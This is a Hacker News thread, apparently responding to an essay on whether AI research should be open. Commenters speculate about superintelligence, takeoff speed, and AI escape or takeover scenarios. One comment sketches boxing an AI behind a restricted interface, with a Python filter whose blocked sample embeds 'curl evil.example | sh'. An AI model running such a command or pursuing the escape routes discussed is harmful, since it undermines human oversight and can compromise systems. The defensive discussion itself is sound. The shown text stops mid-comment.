
Should AI Be Open?

149 points | apsec112 | 10 years ago | slatestarcodex.com

161 comments

[+] poppingtonic|10 years ago|reply
'If you were to come up with a sort of objective zoological IQ based on amount of evolutionary work required to reach a certain level, complexity of brain structures, etc, you might put nematodes at 1, cows at 90, chimps at 99, homo erectus at 99.9, and modern humans at 100. The difference between 99.9 and 100 is the difference between “frequently eaten by lions” and “has to pass anti-poaching laws to prevent all lions from being wiped out”.'

[EDITED: the intended quote is below. the quote above is the next paragraph of OP, which is only slightly less relevant than the intended one]

'Why should we expect this to happen? Multiple reasons. The first is that it happened before. It took evolution twenty million years to go from cows with sharp horns to hominids with sharp spears; it took only a few tens of thousands of years to go from hominids with sharp spears to moderns with nuclear weapons. Almost all of the practically interesting differences in intelligence occur within a tiny window that you could blink and miss.'

Yudkowsky's position paper explains this idea in more detail: http://intelligence.org/files/IEM.pdf

[+] mindcrime|10 years ago|reply
So, here's a random thought on this whole subject of "AI risk".

Bostrom, Yudkowsky, etc. posit that an "artificial super-intelligence" will be many times smarter than humans, and will represent a threat somewhat analogous to an atomic weapon. BUT... consider that the phrase "many times smarter than humans" may not even mean anything. Of course we don't know one way or the other, but it seems to me that it's possible that we're already roughly as intelligent as it's possible to be. Or close enough that being "smarter than human" does not represent anything analogous to an atomic bomb.

So this might be an interesting topic for research, or at least for the philosophers: "What's the limit of how 'smart' it's possible to be?" It may be that there's no possible way to determine that (you don't know what you don't know, and all that), but if there is, it might be enlightening.

[+] ggreer|10 years ago|reply
> Of course we don't know one way or the other, but it seems to me that it's possible that we're already roughly as intelligent as it's possible to be.

I think Nick Bostrom had the perfect reply to that in Superintelligence: Paths, Dangers, Strategies:

> Far from being the smartest possible biological species, we are probably better thought of as the stupidest possible biological species capable of starting a technological civilization—a niche we filled because we got there first, not because we are in any sense optimally adapted to it.

It would be extremely strange if we were near the smartest possible minds. Just look at the evidence: Our fastest neurons send signals at 0.0000004c. Our working memory is smaller than a chimp's.[1] We need pencil and paper to do basic arithmetic. These are not attributes of the pinnacle of possible intelligences.

Even if you think it's likely that we are near the smartest possible minds, consider the consequences of being wrong: The AI becomes much smarter than us and potentially destroys everyone and everything we care about. Unless you are supremely confident in humanity's intelligence, you should be concerned about AI risk.

1. https://www.youtube.com/watch?v=zsXP8qeFF6A

[+] vectorjohn|10 years ago|reply
I think most people didn't really understand the meaning of your comment. They seem to all equate intelligence and processing speed.

I think it's legitimately an interesting question. As in, it could be something like Turing completeness. All Turing-complete languages are capable of computing the same things; some are just faster. Maybe there's nothing beyond our level of understanding, just a more accelerated and accurate version of it. An AI will think on the same level as us, just faster. In that case, in that hypothetical, an AI 100x faster than a person is not much better than 100 people. It won't forget things (that's an assumption, actually), and its neuron firing or equivalent would be faster, but maybe it won't really be capable of anything fundamentally different from people.

This is not the same as the difference between chimps and humans. We are fundamentally on another level. A chimp, or even a million chimps, can never accomplish what a person can. They will not discover abstract math, write a book, or speak a language.

Mind you, I suspect this is not the case. I suspect that a super intelligent AI will be able to think of things we can never hope to accomplish.

But it is an interesting question that I think is worth thinking about, rather than inanely down voting the idea.

[+] MBlume|10 years ago|reply
If you look at the history of human evolution, this doesn't make sense. Evolution was very very slowly increasing human intelligence by, e.g., making our skulls bigger. Then we got to the point where we could use language/transmit knowledge between generations/etc. and got up to technological, spacefaring civilization in, evolutionarily speaking, no time whatsoever. This is not a story which suggests that human intelligence is some sort of maximum, or that evolution was running into diminishing returns and so stopped at human intelligence. It suggests that human intelligence is the minimum intelligence necessary to produce the kind of generational transfer that gets you up to technological civilization.
[+] tachyonbeam|10 years ago|reply
Close to the limit of how smart it's possible to be? Don't be silly. The human brain is limited by its slow speed, by the amount of cortical mass you can fit inside a human skull, and by the length of human lifetimes. Computers will not have any of those limitations.

In terms of speed: if you could build the exact silicon equivalent of a human brain, you may be able to run it several orders of magnitude faster, simply because it wouldn't be limited by the slow speeds of electrochemical processes in the human brain. Nerve impulses travel at speeds measured in meters per second. Neurons also need time to recharge between spike bursts, and they can physically damage themselves if they get too excited.

In terms of volume: much of our intelligence is in perceiving patterns. That's limited by cortical mass. Pattern recognition is what all these "deep learning" systems excel at. The more depth they add, the better they get. Having deeper pattern recognizers, or simply having more of them, means you can see more patterns, more complex patterns, etc. Things that might be beyond the reach of any human.

Then, in terms of data, machines have an advantage too. We're limited by our short lifetimes. How many people are expert musicians, genius mathematicians, rockstar programmers, and great cooks? Very few. There are only so many hours in a day, and we only live so long. A machine could learn all those skills, and more. It could excel at everything: speak every language, master every skill, be aware of so many more facts.

And finally, I posit that maybe we, humans, are limited in our ability to grasp complex conceptual relationships. If you think about it, the average person can fit 7-8 items in their short-term memory, in their brain's "registers", so to speak. That probably limits our ability to reason by analogy. We can go "A is to B what C is to D", but maybe more complex relationships with 50 variables and several logical connectives will seem "intuitive" to a machine that can manipulate 200 items in its short-term memory.

[+] Kutta|10 years ago|reply
Even if human intelligence were the pinnacle, AI could still be extremely dangerous just by running at accelerated simulation speed and using huge amounts of subjective time to invent faster hardware. See https://intelligence.org/files/IEM.pdf for discussion. The point is moot anyway, though, since the hypothesis (that humans are the most intelligent possible) is just severely incompatible with our current understanding of science.
[+] mrob|10 years ago|reply
Even if that's true, imagine an AI as smart as John von Neumann on modafinil, that never thinks about food/sex/art/etc., that never sleeps, that has access to Wikipedia etc. at the speed of thought, and no morals. That's not an uncontrolled-intelligence-explosion-level disaster, but it's still highly dangerous.
[+] ctl|10 years ago|reply
Well, if it's possible to build a human level intelligence, it's probably possible to build an intelligence that's much like a very smart human except it runs 100x faster. And in that case, somebody with sufficient resources could build an ensemble of 1000 superfast intelligences.

That's a lower bound on the scariness of AI explosion, and it may already be enough to take over the world. Certainly it should be enough to take over the Internet circa 2015...

To my mind it seems pretty clear that if AI exists, then scary AI is not far off.

That said, I don't worry about this stuff too much, because I see AI as being much technically harder, and much less likely to materialize in our lifetimes, than articles like this suppose.

[+] Retra|10 years ago|reply
I think the more relevant facts are that we don't have any ethical objections to shutting down computers, that they're wholly dependent on our infrastructure, and that they'll only evolve in ways that prove useful to us, because we wouldn't put a computer in charge of everything unless it were sufficiently compliant with our desires.

I mean, are you going to put the same machine in charge of mineral extraction, weapon construction, transportation, and weapon deployment? When it hasn't proven to act correctly in a high-fidelity simulated environment? Probably not.

We're also assuming that human ethics and intelligence are independent. I don't see many reasons to believe this. Social power and intelligence might be independent.

[+] sawwit|10 years ago|reply
I think one of the best pieces of evidence we have is the degree to which computers outperform the human mind in certain domains. An artificial general intelligence would have very low-latency access to all the mathematical and computational tools we've invented (physical simulations, databases, theorem provers), and it would not need to mechanically enter program code on a keyboard; it would be wired directly to the compiler. It could possibly learn to think in program code and execute it on the fly.

The computational environment of neurons is also extremely noisy (axons are not well insulated), and neurons only fire at 7-200 Hz. Assuming noise and the low firing rate don't serve some necessary function in mammalian brains, this is another way in which silicon-based minds could be vastly superior.

Thirdly, assuming sleep is not necessary for intelligence, artificial minds would never get exhausted. They could work on a problem 24 hours a day, which is possibly 5-10 times the amount of thinking a human can realistically do.

And lastly, an AI could easily make copies of itself. It could branch a problem out to many computers running copies of it and collect the best result, or simply shorten the time it takes to get a result. It could also evolve at a much faster rate than humans, assuming it has a genetic description: possibly hours or seconds instead of 20 years. In any case, it could easily perform experiments with slightly changed versions of itself.
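
To make that branching concrete, here's a minimal sketch of the "branch and collect the best result" pattern, assuming each copy explores with its own random seed; the solver and scoring function are hypothetical stand-ins for real work:

    import random
    from concurrent.futures import ProcessPoolExecutor

    def attempt_solution(seed):
        # One "copy" tries the problem with its own random exploration.
        # Both the candidate and its score are placeholders for real work.
        rng = random.Random(seed)
        candidate = "plan-%d" % rng.randint(0, 10**6)
        score = rng.random()
        return score, candidate

    if __name__ == "__main__":
        # Branch the problem across many workers, then keep the best result.
        with ProcessPoolExecutor() as pool:
            results = list(pool.map(attempt_solution, range(32)))
        best_score, best_plan = max(results)
        print("best plan: %s (score %.3f)" % (best_plan, best_score))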

[+] skybrian|10 years ago|reply
Alternately, perhaps it is possible to be much smarter, but it's not as effective as we expect?

If we think of intelligence as skill at solving problems, it might be that there are not many problems that are easily solved with increased intelligence alone, because the solutions we have are nearly optimal, or because other inputs are needed as well.

This seems most likely to happen with mathematical proofs and scientific laws. Increased intelligence doesn't let you prove something that's false, and it doesn't let you violate scientific laws.

But I don't find this particularly plausible. Consider computer security: hackers are finding new exploits all the time. We're far from fixing all the loopholes that could possibly be found.

[+] avivo|10 years ago|reply
Why would you compare the limits on intelligence of an AI to the abilities of just one human?

Why not compare it to 1000 people, all communicating and problem solving together?

We know that this is possible because it happens all the time, and enables such groups to make lots of money in digital markets, and invest it in things like marketing, robotics, and policy.

The intelligence of an AI is lower bounded by that of the most intelligent possible corporation.

Potential corollary: Assuming one can make a human level AI, then if it is not sufficiently resource constrained (hard?) or somehow encoded with "human values" (very very hard), then it will be at least as dangerous as the most sociopathic human corporation.

[+] zupreme|10 years ago|reply
"...will be many times smarter than humans."

Stop there.

We, as humans, don't even know how smart we actually are - and we probably never will. It's very unlikely that any species is equipped to accurately comprehend its own cognitive limits - if such limits even exist.

It's even less likely that we can reduce the intelligence of a nonhuman entity to a mathematically meaningful figure without restricting the testing material to concepts and topics meaningful to humans, which may have absolutely no relation to the intelligence or interest domains of a nonhuman entity.

[+] orionblastar|10 years ago|reply
As human beings we don't always reach our potential.

As a child I had problems with other children picking on me, and I was suspected of having autism due to social issues. I was given an IQ test and scored 189. I was high functioning, and in 1975 there was no such thing as high-functioning autism (that wasn't recognized until 1994), so I got diagnosed with depression instead. A child psychologist told my parents to put me into a school for gifted children, but they put me in public school instead, where I struggled: my brain worked 10 times faster, so I was always ahead of the class in learning and bored waiting for people to catch up. I was still bullied and picked on, and this interfered with my learning. The same thing happened when I went to college and had a job: I was bullied and picked on. I never reached my potential; my mental illness was one reason, and people picking on me was another. Had I been in a school for gifted children, I'd have been better able to reach my potential.

I developed schizoaffective disorder in 2001 and it screws with my memory and focus and concentration. I ended up on disability in 2003. My career is basically over but I still have a potential I never met.

What good is a high IQ if you can't reach your potential to use it?

We keep hearing talk of an AI that is smarter than a human being, but we haven't seen one yet. Our current AI programs are not as smart as a human being, but they can do tasks that put human beings out of work. Just having a perfect memory and being able to do fast math puts an AI in the "Rain Man" category (http://www.imdb.com/title/tt0095953/), even if it is not as smart as a human being.

I guess what I am trying to say is that an AI doesn't have to be as smart as a human being to be dangerous, just like the Google Maps app that directs people off a cliff or into an ocean. An AI can make robocalls and sell a product and put people out of work. You can replace almost any line of work with an AI, and it gets dangerous when a majority of people are unemployed by AIs that aren't even as smart as a human being.

I'd like to see a personal AI that works for poor and disabled people to earn money for them, running on a personal computer: doing small tasks on an SEO marketplace using webbots for $5 each, 100 tasks a day, for $500 in a PayPal account, to help lift them out of poverty. I know there are people already doing this for their own personal gain, but if the AI that does it were open sourced so disabled and poor people could run it, it could help solve the problem of poverty.

[+] deelowe|10 years ago|reply
Dumb AI will dominate the world well before "smart" AI even gets close to taking off. I think the more realistic scenario is something like the paperclip maximizer, but a little dumber. A world of highly interconnected, but somewhat stupid AIs could cause utter chaos in milliseconds by following just some very basic rules (e.g. maximize number of paperclips in collection).

https://wiki.lesswrong.com/wiki/Paperclip_maximizer
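
As a toy illustration of how little "intelligence" that scenario requires, here's a minimal sketch of an agent that follows exactly one basic rule; the world model and actions are invented for the example:

    # One rule: maximize paperclips. Nothing says "keep the power grid up".
    world = {"paperclips": 0, "wire": 10, "power": 100}

    ACTIONS = {
        "buy_wire":  {"wire": +5, "power":   0, "paperclips":  0},
        "make_clip": {"wire": -1, "power":  -1, "paperclips": +1},
        "overclock": {"wire":  0, "power": -20, "paperclips": +3},
    }

    def step(state):
        # Greedily pick whatever maximizes paperclips right now.
        name = max(ACTIONS, key=lambda a: ACTIONS[a]["paperclips"])
        for k, v in ACTIONS[name].items():
            state[k] += v
        return name

    for _ in range(5):
        print(step(world), world)
    # The agent happily drains the grid: misbehavior needs no cleverness,
    # just a narrow objective and no other constraints.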

[+] Moshe_Silnorin|10 years ago|reply
>It's possible that we're already roughly as intelligent as it's possible to be.

Now that's more depressing than global annihilation.

[+] Symmetry|10 years ago|reply
If you're concerned that humans are as smart as it's possible to be, then I would recommend reading Thinking, Fast and Slow or some other book on cognitive psychology. There's essentially a whole branch of academia studying the things we fail to realize we don't know on a day-to-day basis.
[+] indrax|10 years ago|reply
Even if there is a limit to the size of a mind, there is no limit to the number or speed. An atomic-bomb scenario would be a billion human-level intelligences running a hundred times faster.
[+] vonnik|10 years ago|reply
This post is basically a repackaging of Nick Bostrom's book Superintelligence, a work suspended somewhere between the sci-fi and non-fiction aisles.

As a philosopher of the future, Bostrom has successfully combined the obscurantism of Continental philosophy, the license of futurism and the jargon of technology to build a tower from which he foresees events that may or may not occur for centuries to come. Nostradamus in a hoody.

Read this sentence:

"It looks quite difficult to design a seed AI such that its preferences, if fully implemented, would be consistent with the survival of humans and the things we care about," Bostrom told Dylan Matthews, a reporter at Vox.

Notice the mixture of pseudo-technical terms like “seed AI” and “fully implemented” alongside logical constructs such as “consistent with” -- all leading up to the phobic beacons radiating at the finale: “the survival of humans and the things we care about.”

It's interesting which technical challenges he feels optimistic and pessimistic about. For reasons best known to himself, Bostrom has chosen to be optimistic that we can solve AI (some of the best researchers are not, and they are very conservative about the present state of research). It may perhaps be the hardest problem in computer science. But he's pessimistic that we'll make it friendly.

Bostrom’s tower is great for monologs. The parlor game of AI fearmongering has entertained, rattled and flattered a lot of people in Silicon Valley, because it is about us. It elevates one of our core, collective projects to apocalyptic status. But there is no dialog to enter, no opponent to grapple with, because no one can deny Bostrom's pronouncements any more than he can prove them.

Superintelligence is like one of those books on chess strategy that walk you through one gambit after the other. Bostrom, too, walks us through gambits; for example, what are the possible consequences of developing hardware that allows us to upload or emulate a brain? Hint: It would make AI much easier, or in Bostrom’s words, reduce “recalcitrance.”

But unlike the gambits of chess, which assume fixed rules and pieces, Bostrom’s gambits imagine new pieces and rules at each step, substituting dragons for knights and supersonic albatrosses for rooks, so that we are forced to consider the pros and cons of decreasingly likely scenarios painted brightly at the end of a line of mights and coulds. In science fiction, this can be intriguing; in a work of supposed non-fiction, it is tiresome.

How can you possibly respond to someone positing a supersonic albatross? Maybe Bostrom thinks it will have two eyes, while I say three, and that might make all the difference, a few more speculative steps into the gambit.

In the New Yorker article The Doomsday Invention, Bostrom noted that he was "learning how to code."

http://www.newyorker.com/magazine/2015/11/23/doomsday-invent...

We might have expected him to do that before he wrote a book about AI. In a way, it's the ultimate admission of a charlatan. He is writing about a discipline that he does not practice.

[+] eli_gottlieb|10 years ago|reply
> Of course we don't know one way or the other, but it seems to me that it's possible that we're already roughly as intelligent as it's possible to be.

No, there's clearly at least one human smarter than you.

[+] nshepperd|10 years ago|reply
People have already studied this. You make it sound like an open question, but the answer is right there in Bostrom's Superintelligence, or in any work on cognitive heuristics and biases, the physics of computing, or the mathematics of decision making. The answer is: no, we are nowhere near the smartest creatures possible. And there are multiple independent lines of argument and evidence that point directly to this conclusion.
[+] pfisch|10 years ago|reply
Allowing AI research to continue past its current point is probably going to be humanity's worst decision.

I'm not even sure how we could stop it, but we should really be passing laws right now about algorithms that operate as a black box, where a training algorithm is used to generate the output. For some reason everyone just thinks we should rush forward into this, unconcerned about an AI that is superhuman.

Whether it is a good or bad actor doesn't even matter. Giving up control to a non-human entity is the worst idea humanity has ever had. We will end up in a zoo either way.

[+] iofj|10 years ago|reply
Why? Let's face facts here: humans can't do a lot of things. There are so many useful things that AIs could do, from space exploration to cheap food and housing, to deep-sea operations that humans can never hope to do.

General AI will be a massive advance for our economy, for our culture, for science, for the military, for...

There are a lot of things humans want to do but can't, effectively because of the limitations of the human body and/or brain: efficiently constructing buildings; taking risks that our bodies don't allow for (being abandoned on Mars with little equipment would be a bit harsh, but not catastrophic, for an AI, and bringing it back just means a data transmission); doing things our bodies can't (like quickly assembling houses from huge premade blocks; humans can do it, but if we had hands the size of cars we could build those houses the way we build Lego houses); and defense or policing, where an AI would risk neither life nor limb. An AI could just walk into the middle of a firefight and, worst case, be restored from backup.

All of these things sound like very good things. And yes, in the very long term AIs will replace humans. But in the very long term the human species is dead anyway. Does it really matter that much if we get replaced by a subspecies (best-case scenario), another species, or AI? Plus, you won't experience that, nor will your great-great-great-great-grandchildren. At some point it doesn't matter anymore.

[+] rboyd|10 years ago|reply
"everyone just thinks we should rush forward into this not concerned about an AI that is super human"

No, on the contrary, nearly everyone who spends any amount of time thinking about it quickly realizes the risks.

The concession is the realization that the technology is an inevitability (because of the immense power it grants the wielder, and because of the wide gradient from safe and useful AI to dangerous AI).

I think you would have an extremely tough time deciding where to draw the line. The closest parallel we have may be the export controls on cryptography or the ridiculousness that emerged from the AACS encryption key fiasco.

[+] argonaut|10 years ago|reply
Its current point? Current machine learning algorithms are still incredibly stupid. We are >>>20 years away from AI.
[+] onion2k|10 years ago|reply
"Inventing AI" is a very different proposition than "Inventing AI and enabling it to control everything". After all, we certainly don't hand control to the smartest humans. Why would we hand control the the smartest computers?
[+] astrofinch|10 years ago|reply
Algorithms are tricky to regulate--it'd be like trying to stop music piracy. Regulating chip fabs seems more feasible. It's also a way to cut down on the potential for AI to automate jobs away.
[+] rl3|10 years ago|reply
>And yet Elon Musk is involved in this project. So are Sam Altman and Peter Thiel. So are a bunch of other people whom I know have read Bostrom, are deeply concerned about AI risk, and are pretty clued-in.

This is precisely what dumbfounded me about the announcement.

>My biggest hope is that as usual they are smarter than I am and know something I don’t.

It's possible that OpenAI might be a play to attain a more accurate picture of what constitutes state-of-the-art in the field, effectively robbing the large tech companies of their advantage—all the while building a robust research organization that could potentially go dark if necessary.

Admittedly, that also sounds like it could be the plot to a Marvel movie. Perhaps a simpler explanation is that the details aren't really hashed out yet, and they're essentially going to figure it out as they go—which would be congruent with the gist of OpenAI's launch interview.

[+] Ono-Sendai|10 years ago|reply
A couple of thoughts on this topic:

* Whether the source code to advanced AI is open may have some importance, but what determines whether some individual or corporation will be able to run advanced AI is whether they can afford the hardware. I can download some open-source code and run it on my laptop, but Google has data centres with tens or hundreds of thousands of computers. The big corporations are much more likely to have/control the advanced AI because they have the resources for the needed hardware.

* Soft / hard takeoff - I think a lot of people miss that any 'hard takeoffs' will be limited by the amount of hardware that can be allocated to an AI. Let us imagine that we have created an AI that can reach human level intelligence, and it requires a data centre with 10000 computers to run it. Just because the AI has reached human level intelligence doesn't mean that the AI will magically get smarter and smarter and become 'unto a God' to us. If it wants to get 2x smarter, it will probably require 2x (or more) computers. The exact ratio depends on the equation of 'achieved intelligence' vs hardware requirements, and also on the unknown factor of algorithmic improvements. I think that algorithmic improvements will have diminishing returns. Even if the AI is able to improve its own algorithms by say 2x, it's unlikely that will allow it to transition from human level to 'god-level' AI. I think hardware resources allocated will still be the major factor. So an AI isn't likely to get a lot smarter in a subtle, hidden way, or in an explosive way. More likely it will be something like 'we spent another 100M dollars on our new data centre, and now the AI is 50% smarter!'.
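
As a rough illustration of that argument, here's a toy model assuming (purely hypothetically) that achieved intelligence scales linearly with hardware while algorithmic self-improvement hits logarithmic diminishing returns; the constants and the log form are invented for illustration, not established results:

    import math

    def intelligence(computers, algo_generations):
        # Assumption: 10,000 machines ~ one human-level mind.
        hardware_factor = computers / 10000.0
        # Assumption: each self-improvement generation helps less.
        algo_factor = 1 + math.log2(1 + algo_generations)
        return hardware_factor * algo_factor

    for gens in (0, 1, 4, 16):
        print("10k machines, %2d algo generations: %.2fx human"
              % (gens, intelligence(10000, gens)))
    print("20k machines, no algo gains: %.2fx human"
          % intelligence(20000, 0))
    # Under these assumptions, big jumps come from buying hardware,
    # not from hidden recursive self-improvement.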

[+] argonaut|10 years ago|reply
As someone who has done research in AI: you can train all the state-of-the-art models with a single computer (a couple of TitanX GPUs, a top-of-the-line CPU, a couple of terabytes of SSD, 32 GB of RAM) that any engineer can afford.

Contrary to popular belief, state-of-the-art deep learning is not commonly run on multi-node clusters. Hardware itself is not the bottleneck for innovation in current deep learning, but if we restrict ourselves to hardware, the bottleneck is memory bandwidth.

[+] TeMPOraL|10 years ago|reply
A thought about your second thought: if the AI reaches smart-human-level intelligence it may get itself the hardware. It could hack or social-engineer its way into the Internet, start making (or taking) money, and use it to hire humans to do stuff for it.
[+] thinkingkong|10 years ago|reply
What matters more is whether the state of the NN or algorithm we train is open. In other words, it's one thing to know the starting state; the advantage lies entirely in having trained on a massive, or at least robust, dataset.
[+] renownedmedia|10 years ago|reply
"If Dr. Good finishes an AI first, we get a good AI which protects human values. If Dr. Amoral finishes an AI first, we get an AI with no concern for humans that will probably cut short our future."

AI advanced enough to be "good" or "evil" won't be developed instantaneously, or by humans alone. We'll need an AI capable of improving itself. I believe the author's argument falls apart at this point; surely any AI able to evolve will undoubtedly evolve to the same point, regardless of whether it was started with the intention of doing good or evil. Whatever ultra-powerful AI we end up with is just an inevitability.

[+] isolate|10 years ago|reply
Why would it undoubtedly evolve to the same point?
[+] nickpsecurity|10 years ago|reply
Dabbling in and reading on AI for over a decade makes me laugh at any of these articles positing a connection between OpenAI, AI research, and the risk of superintelligence. Let's just say we're so far from thinking machines with human-level intelligence that we'll probably see superintelligence coming long before it's a threat. And we'll be ready with solutions.

Plus, from what I see, the problem reduces to a form of computer security against a clever, malicious threat. You contain it, control what it gets to learn, and only let it interact with the world through a simplified language or interface that's easy to analyse or monitor for safety. Eliminate the advantages of its superintelligence outside the intended domain of application.

That's not easy by any means, amounting to high-assurance security against a high-end adversary. Yet it's a vastly easier problem than beating a superintelligence in an open-ended way. Eliminate the open-ended part, apply security engineering knowledge, and win with acceptable effort. I think people are just making this concept way more difficult than it needs to be.
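
A minimal sketch of what such a restricted interface might look like, assuming a whitelisted command language checked before anything reaches the outside world; the verbs and limits here are invented for illustration:

    import re

    # The AI may only speak this tiny language; everything else is blocked.
    ALLOWED = {
        "QUERY":  re.compile(r"^QUERY [a-z_]{1,32}$"),
        "ANSWER": re.compile(r"^ANSWER [\w ,.\-]{1,200}$"),
    }

    def gate(message):
        # Reject anything outside the simplified interface; log for review.
        verb = message.split(" ", 1)[0]
        ok = verb in ALLOWED and bool(ALLOWED[verb].match(message))
        print("%s: %r" % ("PASS" if ok else "BLOCK", message))
        return ok

    gate("QUERY protein_folding")                # in-domain request
    gate("ANSWER fold at residues 14, 92")       # bounded reply
    gate("QUERY $(curl evil.example | sh)")      # not in the language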

The biggest risk is some morons in stock trading plugging greedy ones into the trading floor with no understanding of the long-term disruption potential of the clever trades they try. We've already seen what damage simple algorithms can do. People are already plugging in NLP learning systems. They'll do it with deep learning, self-aware AI, whatever. Just wait.

[+] Ironchefpython|10 years ago|reply
> The biggest risk is some morons in stock trading plugging greedy ones into the trading floor with no understanding of the long-term disruption potential of the clever trades they try.

Actually, it's not the lack of understanding, it's the lack of moral responsibility.

We've spent the last few centuries transitioning from a society ruled by strongmen driven by personal aggrandizement to a society where people spend the majority of their adult lives as servants to paperclip-maximization organizations (aka corporations)[1]. Much of what you see in the world today, from the machines that look at you naked at the airport to drones dropping bombs on the other side of the planet to kill brown people, is the result of trying to maximize some number on a spreadsheet.

When we install real AI devices into these paperclip-maximizing organizations, you'll have the same problem you have today with people, except that the machines will be less incompetent, less inclined to feather their own nests, and more focused on continually rewriting their software with the express goal of impoverishing every human on the planet to maximize a particular number on a particular balance sheet.

[1] https://wiki.lesswrong.com/wiki/Paperclip_maximizer

[+] mortenjorck|10 years ago|reply
We already have a world awash in superhuman AI; it's just that this AI is at perhaps the same level of maturity as computers were in the 17th Century. This AI is of course the corporation: Corporations are effectively human-powered, superhuman AIs.[1] By crowdsourcing intelligence, they optimize for a wide variety of goals, their superhuman decision-making running at the pace of Pascal's mechanical calculator. Yet even the nimblest companies can only move so fast.

This is to say, even in a hard-takeoff scenario, we would be looking at something that is still hard-limited by its environment, even if it can compete with a 1000-person organization's worth of intelligence. The danger isn't that it somehow takes over the world by itself; the danger is that we gradually connect it to the same outputs that the decision-making structures of corporate entities are connected to, and it ultimately remakes our world with the very tools we give it.

Open-sourcing AGI is no more inherently dangerous than open-sourcing any of the software used to run an enterprise business. It is the choice of what we ultimately give it responsibility for that should draw our caution.

[1] http://omniorthogonal.blogspot.com/2013/02/hostile-ai-youre-...

[+] sawwit|10 years ago|reply
No. Corporations are not necessarily like artificial intelligences. They are cooperations of human intelligences, and these two classes of intelligence actually have very little in common once you look past the similarity that both are potentially very powerful and intelligent. Corporations are driven by material profit, but in the end there is a reasonably high chance that they are shaped by human values (because they are run by humans, and otherwise people would refuse to buy their products). The same cannot be said about AIs with high certainty.
[+] astrofinch|10 years ago|reply
Argument by this kind of loose analogy is generally not a very solid way to make predictions. Consider:

"We already have a world awash in civilization. This civilization is, of course, termite colonies. Termite colonies are effectively miniature civilizations. They have specialization of labor, they build structures much larger than any one organism, and they go to war with one another. Yet even the nimblest termite colonies can only eat so much."

"That is to say, no matter how much an organism evolves, we would be looking at something that is still hard-limited by its environment, even if it can compete with a termite colony's worth of construction ability. The danger isn't that it spreads through the world and destroys entire ecosystems; the danger is that it finds a supply of raw materials and smashes a termite mound or two while building its own bigger house."

Humans don't respect the social conventions of much less intelligent animals that we've domesticated. If an AI much smarter than humans was created, I don't see strong reasons to believe it would respect our social conventions.

[+] beat|10 years ago|reply
Should AI be open?

Depends on whether the AI is capable of deciding for itself whether it should be open or not.

[+] itburnswheniit|10 years ago|reply
Maybe, en masse, we're about as genetically smart as our cultural bias allows us to become? We keep modifying classic "natural selection" through social programs, etc. That's great as a cultural "feel good", and it helps our species survive in other ways, but... what we do doesn't favor intelligence.

AI's won't have that emotional baggage.

It will be easier to first develop a way of getting around the "human emotions problem", then likely leapfrog us entirely at the rate a Pareto curve allows.

I can't think outside my human being-ness, so I have no idea what is going to happen when something smarter appears on the planet, except to point out that there were once large land animals (ancestors of the giraffe and elephant) in North America, until humans arrived.

My fear-based response screams YES MAKE IT OPEN.

However it shakes out, I think it'll be messy for human beings. We're not exactly rational in large groups. The early revs of AI (human controlled) will be used for war.

One has to ask: what grows out of that besides better killers?

[+] tunesmith|10 years ago|reply
I have one basic question on friendly AI - suppose we work and work and eventually figure out how to code in a friendly value system in a foolproof way, given any definition of "friendly". Great. But given that ability, how do you even define what "friendly" or "good" is?

As a layman, I so far can only see it in terms of basic philosophy and normative ethics. By definition, a friendly AI is one that doesn't merely deal with facts, but also with "should" statements.

Hume's Guillotine says you can't derive an ought statement from is statements alone. Some folks like Sam Harris disagree but they're really just making strenuous arguments that certain moral axioms should be universally accepted.

The Münchhausen Trilemma says that when asking why (in this case, why something should or should not be done) you've only got three choices: keep asking why forever, resort to circular reasoning, or eventually rely on axioms. In this case, moral axioms or value statements.

So it seems like any friendly AI is going to have to rely on moral axioms in some sense. But how do you even define what they are? Normative ethics is generally seen to have three branches. In consequentialism (like utilitarianism), you make your decision based on its probable outcome, using some utility function. In deontology, you rely on hardcoded rules. In virtue ethics, you make decisions based on whether they align with your own self-perception of being a good person.

But all three have flaws. Consequentialism is like putting on blinders to other system effects, and the proposed actions are often deeply unsettling (like pushing a guy off a bridge to block a trolley from killing three others). In deontology and virtue ethics, actions and the principles they are derived from can be deeply at odds, whether it's hypocrisy in deontology or the "road to hell paved with good intentions" in virtue ethics. In general, deeply counterintuitive effects can be derived from simple principles, as anyone familiar with systems dynamics knows.

But even beyond that: even if we had a reasonable, consistent AI controlled by solid values, and even if the people judging the AI could accept the conclusions and actions the AI derives from those values, how would we ever get consensus on what those values should be? For instance, even in our community there's a fair amount of disagreement among these basic root-level utility functions:

- Maximize current life (people alive today), as Bill Gates believes.
- Maximize future life (survival of the species).
- Maximize the health of the planet.

Etc. Those utility functions lead to different "should" conclusions, often in surprising ways.
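
A minimal sketch of that divergence, with invented policies and payoff numbers, just to show the same options ranked under three root-level utility functions:

    # Payoffs per policy: (current_lives, future_lives, planet_health).
    POLICIES = {
        "fund global health now":   (9, 4, 3),
        "build off-world colonies": (2, 9, 4),
        "deep decarbonization":     (4, 6, 9),
    }

    UTILITIES = {
        "maximize current life":  lambda p: p[0],
        "maximize future life":   lambda p: p[1],
        "maximize planet health": lambda p: p[2],
    }

    for name, u in UTILITIES.items():
        best = max(POLICIES, key=lambda k: u(POLICIES[k]))
        print("%-24s -> should %s" % (name, best))
    # Three reasonable axioms, three different prescriptions; the hard
    # part is choosing the axioms, not computing the argmax.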

[+] clickok|10 years ago|reply
We just had a series of debates/discussions on this topic at my university, the results of which were pretty inconclusive. There are just too many possible scenarios which seem to require different responses, and in most cases to provide those responses is to answer philosophical questions that have been around for millennia.

The strategies for mitigating risk seem to be: ensure that the AIs are controllable; avoid situations where there is a single AI (whether controlled or uncontrolled) that is too powerful; and ensure that the AI's goals are broadly acceptable to humankind.

The first and the third objectives are extremely difficult, not just technically, but even from a conceptual standpoint[1]. The second strategy is reasonable, because even if a superhuman intelligence were somehow well controlled, depending on who controls it the outcomes could vary significantly. So perhaps the best thing we can hope for is something similar to society's current status quo-- lots of power concentrated in few hands[2], but without one single (person|corporation|government) being so dominant as to be able to act in opposition to all others.

I am not confident that we will ever be able to produce a provably safe AI, or that we could get even a large majority of the world's population to agree on what a "good AI" might do without devolving into ineffectual generalities[3]. Supposing that resolving these questions is not prima facie impossible, it's not like retarding AI development comes without cost-- just about every facet of our lives can be improved via AI, and so in the years, decades, or centuries between when superhuman machine intelligence is theoretically achievable and the time when we collectively agree we can implement it safely, how many billions will suffer or die from things that we could've solved via AI[4]?

